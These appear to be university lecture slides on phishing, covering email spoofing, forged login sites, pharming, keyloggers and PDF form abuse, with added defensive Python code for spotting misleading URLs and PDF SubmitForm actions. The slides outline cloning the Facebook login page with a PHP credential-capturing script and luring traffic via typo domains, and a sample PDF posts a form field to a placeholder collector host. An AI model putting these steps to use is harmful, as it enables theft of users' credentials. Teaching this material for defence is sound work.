Phishing - University Of Arizona


Phishing
Junxiao Shi, Sara Saleem
University of Arizona
Apr 23, 2012

1. Introduction
2. Email Spoofing
3. Web Spoofing
4. Pharming
5. Malware
6. Phishing through PDF
7. References

What is Phishing
- a form of social engineering
- to fraudulently retrieve legitimate users' confidential or sensitive credentials
- by mimicking electronic communications from a trustworthy or public organization
- in an automated fashion

Phisher
Labor specialization of phishers:
- Mailers send out a large number of fraudulent emails (usually through bot-nets), which direct users to fraudulent websites
- Collectors set up fraudulent websites (usually hosted on compromised machines), which actively prompt users to provide confidential information
- Cashers use the confidential information to achieve a pay-out

Information Flow
[Figure: information flow in a phishing attack, with numbered steps between the phisher (mailer, collector, casher), the user (victim) and the financial institution]


Email Spoofing
Definition: sending an email that claims to originate from one source when it was actually sent from another.
Discover Card members are more likely to believe an email from support@discover.com than one from an unrelated domain.
When you believe an email, you may act on its instructions, such as:
- reply to the email with your credit card number
- click on the link labelled "view my statement", and enter your password when the website prompts for it
- open an attached PDF form, and enter confidential information into the form

Email Spoofing
Read the report for:
- Why is email spoofing so easy?
- How to send a spoofed email with one line of command?
- What are the countermeasures?


Web Spoofing
1. Set up a forged website
2. Attract traffic to the forged website
3. Collect confidential information entered by users

Creating a forged website
1. Save the Facebook login page as an HTML file, along with images and scripts.
2. Write a PHP script that stores the submitted fields into a file or database, then redirects to the real Facebook.
3. Open the HTML file with a text editor, find the login form, and change the submission URL to that PHP script.
4. Upload these files to a PHP-enabled web server.
- or -
1. Configure a "reverse proxy" using squid or Fiddler2.
2. Write a plug-in that automatically collects information entered by users.

Attracting traffic to the forged website
- Send spoofed emails with a link to the forged website.
- Register a domain that is a common typo, such as facebok.com. (Facebook registered this domain before you.)
- Register the same domain name in a different TLD. For example, register facebook.com.cn, and translate the forged website to Chinese.
- Use pharming.

Legitimate website vs. forged website
https://www.phish-no-phish.com/
How to tell whether a website is legitimate or forged?
- content
- domain name
- usage of https
- certificate

Browser Security Indicator: https padlock
HTTPS, the combination of Hypertext Transfer Protocol and Transport Layer Security, provides encryption and identification through public key infrastructure. Modern web browsers display a padlock icon when visiting an https website.
[Figure: http scheme, no padlock]
[Figure: https scheme, padlock in address bar]

Browser Security Indicator: https padlock
If the certificate is invalid or does not match the domain name, modern browsers will show a prominent warning.
[Figure: a warning page is shown on detecting an untrusted certificate; if the user chooses to continue, the address bar turns red]

Browser Security Indicator: EV
Extended Validation (EV) certificates are only issued after extensive verification of the requesting entity: physical presence, domain control, legal documents.
Modern browsers "turn green" to indicate a higher level of trust.

Browser Security Indicator: domain name highlighting
Phishers tend to use misleading addresses, such as , to deceive users. With domain name highlighting, users can easily interpret the address and identify the current website at a glance.
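To make the highlighting rule concrete, here is an added Python example (not from the slides) that recovers the host a browser would highlight from a few constructed misleading addresses; the two-label approximation of the registrable domain is a simplification of what browsers do with the Public Suffix List.

```python
from urllib.parse import urlsplit

# Constructed sample addresses (not from the slides), each a form phishers
# use to make a page look like it belongs to a trusted site:
SAMPLE_URLS = [
    "https://www.facebook.com/login.php",                # genuine
    "http://www.facebook.com.login-secure.example/",      # brand in a subdomain
    "https://www.facebook.com@203.0.113.10/login",        # brand in the userinfo part
    "http://203.0.113.10/www.facebook.com/index.html",    # brand in the path
    "https://www.facebok.com/",                           # typo domain
]

def registrable_domain(host):
    """Approximate the part a browser highlights: the last two labels of the
    host. This is a simplification; browsers consult the Public Suffix List,
    so names under suffixes such as .com.cn need that list to be handled right."""
    labels = host.lower().rstrip(".").split(".")
    if all(label.isdigit() for label in labels):
        return host  # a bare IP address is highlighted whole
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

def highlight(url):
    """Return (highlighted_domain, full_host). urlsplit().hostname discards
    the userinfo before '@', the port, the path and the query, which is
    exactly the text a misleading address hopes the reader will focus on."""
    host = urlsplit(url).hostname or ""
    return registrable_domain(host), host

def looks_misleading(url, trusted_domain):
    """Flag an address that mentions a trusted domain anywhere in its text
    but is actually served from a different registrable domain."""
    domain, _ = highlight(url)
    return domain != trusted_domain and trusted_domain in url.lower()

def triage(urls, trusted_domain):
    """Map each address to its highlighted domain and a misleading flag."""
    return {u: (highlight(u)[0], looks_misleading(u, trusted_domain)) for u in urls}

if __name__ == "__main__":
    for url, (domain, flagged) in triage(SAMPLE_URLS, "facebook.com").items():
        print(f"{'MISLEADING' if flagged else 'ok        '}  highlighted={domain:<22} {url}")
```

The typo domain is not flagged by this check, because nothing in it names the trusted domain; that case is what the "common typo" bullet on the traffic slide describes and needs a different test.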

Simulated Browser Attack
https? Yes. Padlock? Yes. Green address bar? Yes. Trusted?
[Figure: public terminal in Student Union Memorial Center Food Court]

Simulated Browser Attack
But is this a real Internet Explorer? Probably not.
1. A web page or Flash movie simulates the user interface and behavior of Internet Explorer.
2. The address bar, padlock icon and status bar are all fake.
3. It is opened in a chromeless window or enters full-screen mode.
Everything you enter goes to the phisher; the web pages you see may be modified by the phisher.
That's why you shouldn't use online banking on public computers.


Pharming
Pharming: a type of attack intended to redirect traffic to a fake Internet host.
Read the report for:
- DNS cache poisoning, and its countermeasures
- Domain hijacking, the pharming method with global effects
- Long-term, unnoticeable pharming in a local computer or a home network


Malware
Malware: a piece of software developed either for the purpose of harming a computing device or for deriving benefits from it to the detriment of its user.
In phishing, malware can be used to collect confidential information directly and send it to phishers.
- Keystrokes, screenshots, clipboard contents, and program activities can be collected.
- Malware can display a fake user interface to actively collect information.
- Collected information can be automatically sent to phishers by email, FTP server, or IRC channel.

Keylogger
[Figure: REFOG Free Keylogger configuration]

Keylogger
[Figure: Sign in to Windows Live Messenger]

Keylogger
[Figure: Windows Live ID and password collected by keylogger]

Read from text input control
Malware can read a password from a text input control, even if it's displayed as asterisks.
[Figure: Asterisk Password Recovery reads a password from the SkyDrive login page]

Malware
Malware can also aid other phishing techniques:
- for web spoofing: install the phisher's CA certificate as a trusted root CA, so the browser will not show the warning page when visiting a spoofed https website
- for pharming: change the hosts file or DNS settings; run ARP spoofing on the local Ethernet
- enlist into botnets: send spoofed emails; serve forged websites

Countermeasure: client security products
Client security products are widely deployed:
- Anti-virus products
- Malicious Software Removal Tool (monthly from Microsoft Update)
They are not always effective:
- It's easy to modify malware so that it doesn't contain any known signature
- There are techniques to bypass certain behavior-based detection

Countermeasure from China Merchants Bank online banking client
- USB token
- secure the text input control, so that (most) keyloggers cannot intercept keystrokes or read its content
- encrypt confidential information in memory and over the network
- provide mutual authentication with client and server certificates


Why is this possible?
- PDF: the most popular and trusted document description format.
- PDF programming language: strong execution features which can be exploited.

Illustration
[Figure: fake tax return form received in a spoofed email]

How does it work? SubmitForm action
- Upon invocation of a SubmitForm action, the names and values of selected interactive form fields are transmitted to the specified URL or email address.
- The recipient URL or email address is set at the time the form is created.
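As an added defensive example (not part of the slides), the following Python scans a PDF's raw bytes for SubmitForm actions and reports where each one would send the form data; the embedded PDF fragment is constructed and the collector host is a placeholder. It inspects only uncompressed object syntax, so a real scanner would first inflate FlateDecode object streams.

```python
import re

# Constructed minimal PDF (not a real phishing document): one text field and a
# push button whose /A entry is a SubmitForm action posting the field values to
# an attacker-controlled address (placeholder host, .invalid TLD).
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R 5 0 R] >> >> endobj
4 0 obj << /FT /Tx /T (ssn) /Subtype /Widget /Rect [50 500 300 520] >> endobj
5 0 obj << /FT /Btn /T (submit) /Subtype /Widget
   /A << /Type /Action /S /SubmitForm /F (http://collector.invalid/tax-form) /Flags 4 >> >> endobj
%%EOF
"""

def submit_form_targets(pdf):
    """Return the /F destination of every SubmitForm action in the raw bytes,
    whether /F is a literal string or a file-specification dictionary
    (<< /FS /URL /F (...) >>). Unresolvable targets are reported as such."""
    targets = []
    for m in re.finditer(rb"/S\s*/SubmitForm\b", pdf):
        # Take the enclosing dictionary: from the nearest '<<' before /S to the
        # first '>>' after it. With a file-spec dict either side of /S, the
        # window still contains the inner /F (...) string.
        start = pdf.rfind(b"<<", 0, m.start())
        end = pdf.find(b">>", m.end())
        if start == -1 or end == -1:
            window = pdf[m.start():m.end() + 200]
        else:
            window = pdf[start:end]
        # '/F (' will not match '/Flags', '/FT' or '/FS' because of the '('
        strings = re.findall(rb"/F\s*\(([^)]*)\)", window)
        targets.append(strings[-1].decode("latin-1") if strings else "<unresolved>")
    return targets

def is_external_submit(target):
    """True when a form would push its field values outside the document."""
    return target.lower().startswith(("http://", "https://", "mailto:", "ftp://"))

def scan(pdf):
    """Return (number_of_submit_actions, external_targets) for triage."""
    targets = submit_form_targets(pdf)
    return len(targets), [t for t in targets if is_external_submit(t)]

if __name__ == "__main__":
    count, external = scan(SAMPLE_PDF)
    print(f"{count} SubmitForm action(s); external destinations: {external}")
```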

